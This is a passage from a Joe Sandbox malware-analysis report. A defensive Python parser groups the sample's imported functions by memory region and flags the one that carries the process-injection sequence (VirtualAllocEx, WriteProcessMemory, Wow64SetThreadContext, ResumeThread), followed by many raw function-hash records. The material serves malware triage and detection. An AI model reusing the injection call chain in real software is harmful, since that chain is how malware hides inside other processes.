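The records above are Joe Sandbox per-function entries: each one names the Win32 import a function resolves (with its call-site address), the memory-dump region the function was lifted from, and a Similarity block. Read together, the region based at 0x07600000 carries VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, Wow64SetThreadContext and ResumeThread, which is the call chain behind the report's "Injects a PE file into a foreign processes" verdict, while the region at 0x00B90000 only carries GetModuleHandleW, CreateActCtxA and DuplicateHandle. The following is an added example, not code from the report or from Joe Sandbox: a parser for these records that groups the resolved imports by dump region, rebases each call site to its region, and flags any region whose imports cover the whole hollowing sequence. The sample text is copied from six of the entries above, trimmed to the lines the parser reads. Two things are assumptions or outside the report: treating an exact API name in the Similarity block as the import when the record lists no call (the two ResumeThread records above) is a heuristic specific to this listing, and decoding the second PostMessageW argument 0x0010 as WM_CLOSE is a Win32 constant, not something the report states.

```python
import re
from collections import defaultdict

# Constructed sample: six records copied from the listing above, trimmed to the
# lines this parser reads (the bullet is the one the report uses).
SAMPLE = """\
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 00B9B566
• Source File: 00000015.00000002.1514498924.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
• API ID: HandleModule
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07605AF0
• Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
• API ID: MemoryProcessWrite
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07605946
• Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
• API ID: ContextThreadWow64
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07605A0E
• Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
• API ID: AllocVirtual
APIs
• Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
• API ID: ResumeThread
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 0760911D
• Source File: 00000015.00000002.1595247212.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
• API ID: MessagePost
"""

API_RE = re.compile(r"^•\s*(\w+)\.([A-Z0-9]+)\(([^)]*)\),\s*ref:\s*([0-9A-Fa-f]+)$")
REGION_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)")
APIID_RE = re.compile(r"^•\s*API ID:\s*(.*)$")
# Call set behind the report's "Injects a PE file into a foreign processes" verdict;
# the WOW64 and native SetThreadContext variants are interchangeable.
HOLLOWING_STEPS = [{"VirtualAllocEx"}, {"WriteProcessMemory"},
                   {"Wow64SetThreadContext", "SetThreadContext"}, {"ResumeThread"}]
WM_NAMES = {0x0010: "WM_CLOSE"}  # Win32 constant; only the one seen in this report

def _new_record():
    return {"apis": [], "offset": None, "mapped_pe": None, "api_id": ""}

def parse_functions(text):
    """One dict per function record: resolved API calls, dump-region base, Similarity API ID."""
    funcs, cur = [], _new_record()
    for raw in text.splitlines():
        line = raw.strip()
        if line in ("APIs", "Strings") or (line == "Memory Dump Source" and cur["offset"] is not None):
            if cur["apis"] or cur["offset"] is not None:
                funcs.append(cur)
            cur = _new_record()
        elif m := API_RE.match(line):
            name, module, args, ref = m.groups()
            cur["apis"].append({"name": name, "module": module, "ref": int(ref, 16),
                                "args": [a.strip() for a in args.split(",")]})
        elif m := REGION_RE.search(line):
            cur["offset"], cur["mapped_pe"] = int(m.group(1), 16), m.group(2) == "true"
        elif m := APIID_RE.match(line):
            cur["api_id"] = m.group(1).strip()
    if cur["apis"] or cur["offset"] is not None:
        funcs.append(cur)
    return funcs

def apis_by_region(funcs):
    """Region base -> {API name: [call-site offsets relative to the region base]}."""
    regions = defaultdict(lambda: defaultdict(list))
    for f in funcs:
        if f["offset"] is None:
            continue
        for call in f["apis"]:
            regions[f["offset"]][call["name"]].append(call["ref"] - f["offset"])
        # Assumption: a record with no listed call but an exact API name in its
        # Similarity block (the ResumeThread records above) still counts as that import.
        if not f["apis"] and any(f["api_id"] in step for step in HOLLOWING_STEPS):
            regions[f["offset"]][f["api_id"]].append(None)
    return regions

def find_hollowing_regions(funcs):
    """Region bases whose combined imports cover every step of the hollowing sequence."""
    hits = {}
    for base, calls in apis_by_region(funcs).items():
        matched = [next((n for n in step if n in calls), None) for step in HOLLOWING_STEPS]
        if all(matched):
            hits[base] = matched
    return hits

def describe_post_message(call):
    """Decode the uMsg argument of a PostMessageW record ('?' means the sandbox left it unresolved)."""
    msg = call["args"][1]
    return "unresolved" if msg == "?" else WM_NAMES.get(int(msg, 16), f"0x{int(msg, 16):04X}")

if __name__ == "__main__":
    records = parse_functions(SAMPLE)
    for base, steps in find_hollowing_regions(records).items():
        print(f"region 0x{base:08X}: {' -> '.join(steps)}")
    for call in (c for r in records for c in r["apis"] if c["name"] == "PostMessageW"):
        print(f"PostMessageW at 0x{call['ref']:08X}: uMsg = {describe_post_message(call)}")
```

Run against the full function listing of a report, the per-region view separates the loader/stub code (here 0x00B90000) from the region that does the injection (0x07600000); the rebased call-site offsets (for instance WriteProcessMemory at region offset 0x5AF0) are what you would carry into a YARA rule or a memory-dump triage note rather than the absolute addresses, which change from run to run.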
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (q
                                  • API String ID: 0-2414175341
                                  • Opcode ID: d8cdc25dc81d66d3b207365278027096ea65b238e574d42db523336e886d60c7
                                  • Instruction ID: d61113f1340a9108b22cd72c72f916801692260d0b8a18b4e9de911abf381cf6
                                  • Opcode Fuzzy Hash: d8cdc25dc81d66d3b207365278027096ea65b238e574d42db523336e886d60c7
                                  • Instruction Fuzzy Hash: 1671C4B16103069FEB25DB69D8447AEB7E6EFC8300F10892EE4069B290DF759D42C751
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0,Gq
                                  • API String ID: 0-2013397073
                                  • Opcode ID: 235d7fcc44cfcdf318df047fc5d9c22f9b8056b3ce4f4dbca7ca555022c22458
                                  • Instruction ID: baaa38fd4430f7ac9466b531a9f8032b4ce90ef1e2ad5001937ce34ae9b8206f
                                  • Opcode Fuzzy Hash: 235d7fcc44cfcdf318df047fc5d9c22f9b8056b3ce4f4dbca7ca555022c22458
                                  • Instruction Fuzzy Hash: 4271E334B042059FE704EB78D455A9DBBB2EF89300F0885E9D8859F386CB346E46C782
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Teq
                                  • API String ID: 0-1098410595
                                  • Opcode ID: 0fbd3e7f0cb841fe34972ae3a1fffd5428a14c31304ccb49cfb0d781c1cce7cb
                                  • Instruction ID: 1869acbfd62a9d51005902fcb77b850e5bd5f4d0189e4f5be3de821a83b121ad
                                  • Opcode Fuzzy Hash: 0fbd3e7f0cb841fe34972ae3a1fffd5428a14c31304ccb49cfb0d781c1cce7cb
                                  • Instruction Fuzzy Hash: A57104B4E24218CFDB08CFA9C984AEEBBB6FF9A300F148129D419AB354D7745945CF50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0,Gq
                                  • API String ID: 0-2013397073
                                  • Opcode ID: a2257d3bb2c791b02b9b61fed18fabe5116ce1893676db00fd6f9126ccf76f2b
                                  • Instruction ID: d910126c1f24c32a83084fea1b2f33c9afe1e34f2c101d84b3abc953a232db40
                                  • Opcode Fuzzy Hash: a2257d3bb2c791b02b9b61fed18fabe5116ce1893676db00fd6f9126ccf76f2b
                                  • Instruction Fuzzy Hash: 3C619234B002059FD714AB68D455AAEB7B2FF88300F1489A9D8855F386CB716E86CBC6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $q
                                  • API String ID: 0-1301096350
                                  • Opcode ID: 0d5d89b949144cfa87072a8dafdcace60365227ec3d7952a9d61f4e67b26e953
                                  • Instruction ID: a7e979b35510df6be3d40a533f56aa63e4293a67f7d51aab48875a7d91539964
                                  • Opcode Fuzzy Hash: 0d5d89b949144cfa87072a8dafdcace60365227ec3d7952a9d61f4e67b26e953
                                  • Instruction Fuzzy Hash: 4111D0B0A3C6D1DFC322E66495102757BA59B73205F18C7EFF54ACB182C6BE884183A6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $q
                                  • API String ID: 0-1301096350
                                  • Opcode ID: 30e6a3af6586461743b92a77da3d6409d948f6b4ef81f693fffa3960bc6b17d4
                                  • Instruction ID: b8378713713d6b74b47c9108fb7d607a705814ada0bea422b8e7f4a48b91eb19
                                  • Opcode Fuzzy Hash: 30e6a3af6586461743b92a77da3d6409d948f6b4ef81f693fffa3960bc6b17d4
                                  • Instruction Fuzzy Hash: B4F062F1A35593CBD314CA14DA09370B7A1FB62346F05C3AF984ECB141D7B58481C79A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: G
                                  • API String ID: 0-985283518
                                  • Opcode ID: 8b7fccdf2dc28815dd5c029f56088e713918ba21bfdd6ebfb7506f331124f2fd
                                  • Instruction ID: a0e58d79b7460b66b521097ef75af40620af0e9ecfb7d74441bc011bf9a1e629
                                  • Opcode Fuzzy Hash: 8b7fccdf2dc28815dd5c029f56088e713918ba21bfdd6ebfb7506f331124f2fd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                  • Instruction ID: 5599f023b447d9576c52248841e1afca8eaa26c54b4a12d0efbf7e0b6213ea56
                                  • Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                  • Instruction Fuzzy Hash: 36119075504240DFDB15CF50D5C4B56FF61FB84314F24C6A9E8494B696C33AD84ACB51
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dd931783877d7793b6db208cf99c6970d02134aee84a310348cb9c440ea14a33
                                  • Instruction ID: 693b92ca921017208bbea5dc51f989414b3c874b39813cfc5a0235d678ac928a
                                  • Opcode Fuzzy Hash: dd931783877d7793b6db208cf99c6970d02134aee84a310348cb9c440ea14a33
                                  • Instruction Fuzzy Hash: 6F018132604296AFCB029F689C0489EBFBAFF892107148027F905C3351DB318D21DB90
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2c781e6cd6203e89380b39af88e5b826ebc8c41ec2f642a521d19b66d5c804d2
                                  • Instruction ID: aefcbea038499ebd6a75c64936553808af38937dff34a186b1dd48a224009378
                                  • Opcode Fuzzy Hash: 2c781e6cd6203e89380b39af88e5b826ebc8c41ec2f642a521d19b66d5c804d2
                                  • Instruction Fuzzy Hash: 4C01D2B097C3858FD302D664C4042B97FB29B5331AF18C1EEC4554F68AC77A8486CB62
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8fb39819165226b63fbbf3cc26a3592fda4d7be010e73c0ed5d71e1bf4d692df
                                  • Instruction ID: cbf41b3a9116df7925b69d2f5bcd8438b3ac952973b306d8acc4e1574113acc3
                                  • Opcode Fuzzy Hash: 8fb39819165226b63fbbf3cc26a3592fda4d7be010e73c0ed5d71e1bf4d692df
                                  • Instruction Fuzzy Hash: B4F0F636700300DFD3169F68E405A86BFB2FFC9322F15807BE189CB291DA348806CBA0
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cbc44d46a8a17b789ae41ad87a9f2be5bbcba60f3e2919c945589d672d4e8d5d
                                  • Instruction ID: ea2943a709226fe0e8671da54ecf1c0a4b14ab1ea62c80e9315669ee608f11eb
                                  • Opcode Fuzzy Hash: cbc44d46a8a17b789ae41ad87a9f2be5bbcba60f3e2919c945589d672d4e8d5d
                                  • Instruction Fuzzy Hash: 58F01235710219AF9B055F59D84586EBFAAFB8C2207108027FD15C3350DF718D219B90
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 46059fa4a05c993dd124ceb3e491114eab38439e72ee6a5af9f29a2a891bfd35
                                  • Instruction ID: 7e8c1e387305e9282f8b9442f8e7b74b4e0f5bbedf6791951985b88aa1a91aab
                                  • Opcode Fuzzy Hash: 46059fa4a05c993dd124ceb3e491114eab38439e72ee6a5af9f29a2a891bfd35
                                  • Instruction Fuzzy Hash: 36F082B2614109AFDF08DF64E85599E7FAAEF54260F1482AAE408DB220EA31E9508790
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8895672f5bc0233f6f7fd2c122e014f79a3572d8fd7afd4a990973df6d45bc01
                                  • Instruction ID: 0c5812a3895143f866bdfd844587d31d361d55a3b777f01af720967709e4304a
                                  • Opcode Fuzzy Hash: 8895672f5bc0233f6f7fd2c122e014f79a3572d8fd7afd4a990973df6d45bc01
                                  • Instruction Fuzzy Hash: 4EF0B4E1D3C1D0CFC311C69859541B13BA5EA77102F8587CFB4478E5A5E6B944018397
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c7b8d9f95465d8417b696c15ebf216cb8d679a237c639e03d6e008aeef85b9cd
                                  • Instruction ID: 7bb85a38782f0ae56d7fb5ba3cc108f269ff3124a8d8bde5f74b2754afbeee65
                                  • Opcode Fuzzy Hash: c7b8d9f95465d8417b696c15ebf216cb8d679a237c639e03d6e008aeef85b9cd
                                  • Instruction Fuzzy Hash: F3F06274A101088FCB44EF98C592B9DBBF2FF98320F288559A409A7344CA31AD43CB81
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 461e2b72b0a20be77340a1ec0481e2cfeddba661846d519d77f8a86ffcd8de6d
                                  • Instruction ID: ac32eae2668391dbcfbc3c61c9303a9707f78f71d415bb79f0aa4535702c5cbc
                                  • Opcode Fuzzy Hash: 461e2b72b0a20be77340a1ec0481e2cfeddba661846d519d77f8a86ffcd8de6d
                                  • Instruction Fuzzy Hash: 01F09670A55345DFDB01DB74CC4A9ADBB72AF56300F00C256E5125A1D1C7744855DB51
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 714dfe4ea22f05113a8d16b6333890f6aa03a647b591e6b1d9d6a3b2a4c9a965
                                  • Instruction ID: 503cb3169404efb8ea84db265e561782be0966238bfd70b2765bcc6b52ce752c
                                  • Opcode Fuzzy Hash: 714dfe4ea22f05113a8d16b6333890f6aa03a647b591e6b1d9d6a3b2a4c9a965
                                  • Instruction Fuzzy Hash: 10E026226082008BD3026B7328162F637AADF42406B0740A6E185CB2C2CA1C89028391
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1969b2739e59a279129f56401d0335c6eadbe8a035ddf0640a3b6c57f1059e06
                                  • Instruction ID: 2946ab37f0e50ae2b846713d0771d050b28fab2a6270bd799b39178434d30d03
                                  • Opcode Fuzzy Hash: 1969b2739e59a279129f56401d0335c6eadbe8a035ddf0640a3b6c57f1059e06
                                  • Instruction Fuzzy Hash: 63E06D7041978D9ECB12EF348C0409A3FF86F12210B01C5AAE888CA012E63496A8DB90
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5a39bcc4faae81261be2b8df915b2ccf59e46012aa79a10abb30722ddde221f8
                                  • Instruction ID: 2e5b354b0e6b0f9502c5f79944352a04ee1159b9037f7e98c67f4f1711c7606a
                                  • Opcode Fuzzy Hash: 5a39bcc4faae81261be2b8df915b2ccf59e46012aa79a10abb30722ddde221f8
                                  • Instruction Fuzzy Hash: 9EE0E5E5E3D588CB9720DAA869531383B609B6B122F0447CFD88A97642D9A50A109FA3
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 441ac9ed6120ae06dcb7139feb9c6b00bba2cfcb9a5cb41a5edd33110b4aee66
                                  • Instruction ID: 7b1fed7c22b449b22f8c64dd43f7f772d291339f423b4b910d6848faba101277
                                  • Opcode Fuzzy Hash: 441ac9ed6120ae06dcb7139feb9c6b00bba2cfcb9a5cb41a5edd33110b4aee66
                                  • Instruction Fuzzy Hash: EFE0D8F0938648EBE320CB69941676037A9FB56301F00839FE44FAA640DAE148C24773
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 06d747d6e4f650cf1aaabab1eff938d511866034f5201e6c092de9c19fe192b4
                                  • Instruction ID: 02f3250404bce94a104f1680424b5f1f4ef737af1a553d5e50c813c4613c04c9
                                  • Opcode Fuzzy Hash: 06d747d6e4f650cf1aaabab1eff938d511866034f5201e6c092de9c19fe192b4
                                  • Instruction Fuzzy Hash: BFE0206053C204CFC248F754440F73577669B63301F00426F90CB6968DDDE174D18687
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 088ea9b60b1b68da93e10d59c0587271783a3e884694772ef44e36ddfb870277
                                  • Instruction ID: 4fde241dba398012dc01b8df939d7831b553746ccdb7bb7d6082a30e9de38a7b
                                  • Opcode Fuzzy Hash: 088ea9b60b1b68da93e10d59c0587271783a3e884694772ef44e36ddfb870277
                                  • Instruction Fuzzy Hash: 9EE092742297828FD301EB64C8692267BB0EF46204F04C5DB94558B297CA34A80AC752
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4cd0cc55ff93abfdf722efe337492bc7232f9c6f4cd3fe63202110d59ebd49d3
                                  • Instruction ID: 5caf9f317e5dbde6ead9bc72337cec62f9d19b8a7ad9ee991b7e8ef79a280a81
                                  • Opcode Fuzzy Hash: 4cd0cc55ff93abfdf722efe337492bc7232f9c6f4cd3fe63202110d59ebd49d3
                                  • Instruction Fuzzy Hash: 22D05B9067C144CBC548F664540D63976569BB2711F00436E50CFB978EDDD2B8D082D7
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 679a4d55441c7ba721a2f49713090a838268511859591b99d90361d49c25356c
                                  • Instruction ID: 7122cc1ac5b27f8579b38f55bec8d85112f1e42d550d3c05cbfdf190d02f099c
                                  • Opcode Fuzzy Hash: 679a4d55441c7ba721a2f49713090a838268511859591b99d90361d49c25356c
                                  • Instruction Fuzzy Hash: B2D017E0E3C20CDB4220E698684313976A8A77B122F004BCFA80B87304D9E10B004FE3
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 37b2be367eb54e6cad215d999e3a430e711237ed5e78e14ab226de302ebd44de
                                  • Instruction ID: f35e32abf1c3605867c4da467f4093c4b86b4262b8bbc4dd662becea5442062c
                                  • Opcode Fuzzy Hash: 37b2be367eb54e6cad215d999e3a430e711237ed5e78e14ab226de302ebd44de
                                  • Instruction Fuzzy Hash: EFE04FB1D2474ACFC705CF64895626ABBB17F62310F14C16AD01486211D77409058BD2
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 46b5258bf6414b23f3215fe1032b1e342a00606f40b81b76253bd9c979cbfab1
                                  • Instruction ID: e0e1745f2b3d9a2e08d5ac59cf6fc437817115ff071da22724842721f7ba6252
                                  • Opcode Fuzzy Hash: 46b5258bf6414b23f3215fe1032b1e342a00606f40b81b76253bd9c979cbfab1
                                  • Instruction Fuzzy Hash: B2D05E65F34248ABE704EB71984267E26A3B7A4720F98C429684AD7384DDB08D028B52
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 31c44cfea115befadb884885afd4d0ddb14f158ef374371cb389c4e57286859b
                                  • Instruction ID: 454765f8b98b7867848c2862812ed1d8773e25798d2759e97ffe26d5c31dd80d
                                  • Opcode Fuzzy Hash: 31c44cfea115befadb884885afd4d0ddb14f158ef374371cb389c4e57286859b
                                  • Instruction Fuzzy Hash: 4BE0E27186060DDE8B60EE78D90859A7BE8AB15224F00C62AE8499A110EA30D2E8DB80
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d7b6dffb2e902afa8323cd0e371345064962fef9aea0722f725edfe64c77e5ff
                                  • Instruction ID: 1de6153e7740466d9eec183c731aac04515c25361f8ca6fa18f76e3674d130d3
                                  • Opcode Fuzzy Hash: d7b6dffb2e902afa8323cd0e371345064962fef9aea0722f725edfe64c77e5ff
                                  • Instruction Fuzzy Hash: 82D0A730704205C793017FB7681637B73DFEB805427428065E20AC2285CF2CD8018651
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e116226effbfa8bbadb72d19f2cadfc46365b9e548db50bbd7ba313a353247d2
                                  • Instruction ID: b83439ad24b3fa78c6be7cebbb062590cc75fb9992156f2294f535da5f455956
                                  • Opcode Fuzzy Hash: e116226effbfa8bbadb72d19f2cadfc46365b9e548db50bbd7ba313a353247d2
                                  • Instruction Fuzzy Hash: 96C012E06BCA08CBB000E2A824255383A5DE9BB202F10430FE10F8A202EAD248C10633
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.1593573729.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_72c0000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3fade35b5375e9f7560774ca480781cab96e64cc108604b951d9521959261bc8
                                  • Instruction ID: 6837e2e04777fd3c58b482f05821ec0548f167407786bbe4692d7ca1cfa7d310
                                  • Opcode Fuzzy Hash: 3fade35b5375e9f7560774ca480781cab96e64cc108604b951d9521959261bc8
